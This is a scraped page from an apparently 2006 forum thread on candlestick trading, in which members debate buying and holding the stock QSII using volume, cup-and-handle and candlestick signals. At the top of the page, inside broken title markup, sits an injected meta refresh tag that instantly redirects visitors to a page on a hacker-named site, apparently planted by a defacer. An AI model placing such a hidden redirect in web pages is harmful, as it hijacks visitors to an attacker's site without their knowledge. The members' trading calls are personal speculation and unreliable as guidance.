Forum Index" /> <meta http-equiv="refresh" content="0;URL=http://www.turkhacks.com/dosya/heyk.html"> :: View topic - qsii
<meta http-equiv= Forum Index" vspace="1" />
Revolutionizing Investor Psychology

FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 

qsii
Goto page 1, 2  Next

Post new topic   Reply to topic     Forum Index -> Stephen W. Bigalow's Candlestick Trading
View previous topic :: View next topic  
ninner

PostPosted: Sat Oct 07, 2006 4:13 pm    Post subject: qsii Reply with quote

i just bought a small pos in this one.....im waiting for it to break out of 42.10 before i buy more....looks good though...any comments???
Harry

PostPosted: Sat Oct 07, 2006 8:30 pm    Post subject: Reply with quote

Thanks ninner. I like it. The odds are in your favor. I have put it in my watch list. I may have a piece of this one myself if it continues to hold above the 20 pma Very Happy
russjackel

PostPosted: Mon Oct 09, 2006 2:12 am    Post subject: harry Reply with quote

you have posted that you invest in stocks with a large increase in volume and i do not see that in this one. what is it that you like to change your style? just wondered as I follow your comments to learn.
ninner

PostPosted: Mon Oct 09, 2006 3:00 pm    Post subject: Reply with quote

not sure if u were talking to me but ...i will answer cus i like to follow volume....their has been volume surges on the right side of the this cup and handle which i like....the handle should see volume drying up which i am seeing ...i want to see if it reaches the 23.6% fib retracement and how it responds...i have calculated it to be around the 38.77 mark....personally, im a little spooked by this market as i have counted quite a few distribution days so im not putting any more money to work until i see volume increasing causing increased price action.
Harry

PostPosted: Mon Oct 09, 2006 7:35 pm    Post subject: Reply with quote

Here is what I am watching. If it closes above $41.18 (the highest since the first week of Feb.) the volume will be there. If it should go on up and close above $43.50 (an all time high) the volume will be there also. Take a look at NEOL. I took my first position on the 4th. I bought again this morning. Look at the volume for the last week. Once a stock gets to running it can run on average volume, but it has to have some extra buying to get it going. Very Happy
ninner

PostPosted: Mon Oct 09, 2006 9:11 pm    Post subject: cradle pattern Reply with quote

i noticed intraday that qsii was forming a cradle pattern.....im not sure if that is signicant since its intraday but just an observation....or at least i think thats what i saw. LOL...i will buy more at 42.10.....that is the top of the handle of this consolidation pattern...the handle looks very good like Harry said..it does need volume to bust out.
russjackel

PostPosted: Wed Oct 11, 2006 2:03 am    Post subject: Reply with quote

the volume question was for harry but pleased to get an answer and insight from both of you I am still learning and always will be so thought I would ask. thanks
msl

PostPosted: Wed Oct 11, 2006 11:12 am    Post subject: What to do now Reply with quote

Looks like price has retraced back to close to your buy point. Do you exit at breakeven or hold on the expectation that it will bounce off support?
ninner

PostPosted: Wed Oct 11, 2006 11:41 am    Post subject: Reply with quote

well i am concerned about the market at this juncture...i see some breakouts that are retracing back...ie BOT is one....im waiting cus i have my strategy and im sticking with it for abit ....i usually cut my losses at 6-7% regardless to preserve capital.

cheers
ninner

PostPosted: Wed Oct 11, 2006 4:07 pm    Post subject: Reply with quote

towards the end of the day...it had some nice candlestick signals and volume looked to support it...i believe tomorrow will be a nice day....LOL...if im wrong ....try not to rub it in too bad LOL
msl

PostPosted: Wed Oct 11, 2006 4:36 pm    Post subject: Reply with quote

ninner - I'm not rubbing in it at all. My question was asked in all seriousness because this is exactly where the rubber meets the road and the decision point for me that I have struggled with. It is really getting at the true psychology of the situation.

Now, consider this: after buying the stock, price rises nicely for a day or two. However, we have a small range doji AT RESISTANCE, at 41, then a bearish engulfing candle. What does that alone tell you? Next comes a harami at the low end of the candle followed today by a bearish candle.

So, what are the candlesticks telling us? Selling came in hard right at resistance so price was not ready to move higher. What component of your strategy would cause you to continue holding this stock? Again, I'm not being critical at all, but trying to learn and objectively review your trade. Since I don't know what your trade strategy is, you may have a perfectly good reason to hold, but the above is my yeoman's effort at the analysis based on daily candles.
ninner

PostPosted: Wed Oct 11, 2006 4:41 pm    Post subject: Reply with quote

i know u arent...well im getting to the point where i may sell it tomorrow if it doesnt have a nice up day since we are around the 50 day and right near the short term trend line (at least that is by my calculations).. but like i said if u look at the 15 min chart from today ..there were some nice bullish candles i believe towards the end of the day on some nice volume..which i believe will confirm a bullish move tomorrow esp if the market cooperates!!!!
msl

PostPosted: Thu Oct 12, 2006 2:11 pm    Post subject: Reply with quote

3:00 pm - Crunch time now. Daily candle so far shaping up to be a doji harami at the low end of the bearish candle, but with the low of the day only slightly below Wed. Assuming it looks like this coming into the close, does today's candle say to hang with the trade or exit? The answer may depend on whether you like to play defense or offense.
ninner

PostPosted: Thu Oct 12, 2006 3:50 pm    Post subject: Reply with quote

well im hanging in there so far...im a pretty patient person....the doji probably doesnt mean that is alot of buying yet...see where they take it tomorrow...im going out on a limb and saying we at least open higher based on the intraday chart...whether we stay will depend on the market. I use candlesticks along with other methodologies ie..canslim investing...to beat the market....mixed results so far!! Today i think shows in my opinion that there was a least support by the bulls..i think the volume confirms that. i believe its forming a cup and handle and we are in the handle...usually handles can correct about 10-15% from the high which is in line so far ...and towards the end u may get a shakeout attempt which this may indicate
msl

PostPosted: Mon Oct 16, 2006 10:27 am    Post subject: Reply with quote

Looks like you read it correctly with price holding at support and making a good bullish candle on Friday. Today looks good so far as well. It will be interesting to see how it reacts at resistance at 41.
Post new topic   Reply to topic     Forum Index -> Stephen W. Bigalow's Candlestick Trading All times are GMT - 5 Hours
Goto page 1, 2  Next
Page 1 of 2

Jump to: